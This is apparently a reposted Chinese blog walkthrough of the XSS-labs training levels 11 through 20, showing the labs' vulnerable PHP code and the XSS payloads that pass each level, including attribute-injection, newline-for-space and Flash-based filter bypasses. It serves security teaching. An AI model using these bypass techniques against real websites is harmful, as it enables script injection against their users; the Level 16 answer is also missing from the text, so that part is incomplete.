一起来通关xss-labs(下):Level11-20

admin
admin
admin
0
文章
0
评论
2025-12-23 15:58:43 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文解析XSS-labs关卡11至20,涵盖HTTP头注入、ng-include绕过及换行符替代空格等技巧。详细演示了利用Referer等头部和embed参数构造XSSPayload的过程,涉及FlashXSS基础。文章结构清晰,适合Web安全初学者实践。 综合评分: 85 文章分类: WEB安全,渗透测试,漏洞分析

有个src变量,并进行了HTML实体编码,那就是构造一个src语句,完成脚本运行。

可以把前面的关卡利用起来,Level 10也使用htmlspecialchars,我们包含html选择Level 10的http://www.xsslabs.com:8083/level10.php(注意:这里你要填自己的链接地址,注意修改),并利用前面的通关代码,因此可以构造

src=’http://www.xsslabs.com:8083/level10.php?t_sort=”onclick=”javascript:alert(1)” type=”text’

点击输入框,触发弹窗,通关!

通关代码:src=’http://www.xsslabs.com:8083/level10.php?t_sort=”onclick=”javascript:alert(1)” type=”text’

02

Level 16-20

1、Level 16

看一下后端代码

<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace(" ","&nbsp;",$str4);
echo "<center>".$str5."</center>";
?>

把输入的script、空格、/都替换成了&nbsp

因此可以构造如下语句:用换行符替换空格,URL编码换行符是%0A

点击payload的长度:27,触发弹窗,通关!

通关代码:keyword=

2、Level 17

查看后端代码

<?php
ini_set("display_errors", 0);
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>

有两个变量arg01和arg02可以进行传值,进行了HTML实体编码,并且两个中间有个=,假设arg01=111,arg02=222构成这样一样链接

<embed src=xsf01.swf?111=222 width=100% heigth=100%>

因此,我们可以利用中间的=,通过改变arg01和arg02的值构造语句

令arg01=%20onmouseover,arg02=alert(1),构造语句

arg01=%20onmouseover&arg02=alert(1),鼠标经过图片,触发弹窗,通关!

通关代码:arg01=%20onmouseover&arg02=alert(1)

3、Level 18

感觉Level 17没什么区别,尝试输入arg01=%20onmouseover&arg02=alert(1),触发弹窗,通关!

通关代码:arg01=%20onmouseover&arg02=alert(1)

4、Level 19

尝试输入arg01=%20onmouseover&arg02=alert(1),没弹窗,查看前端代码,发现多了双引号””

尝试了很多方法,都不行,放弃了。

通过查阅资料得知,这一关涉及到flash的xss,笔者不懂这方面的,给出别人的答案。

通关代码:arg01=version&arg02=xss

5、Level 20

这一关笔者也不会,看一下别人的答案把。

通关代码:arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(1)//&width&height

THE END

亲爱的朋友,若你觉得文章不错,请点击关注。你的关注是笔者创作的最大动力,感谢有你!

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:菜根网络安全杂谈 Caigensec《一起来通关xss-labs(下):Level 11-20》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  1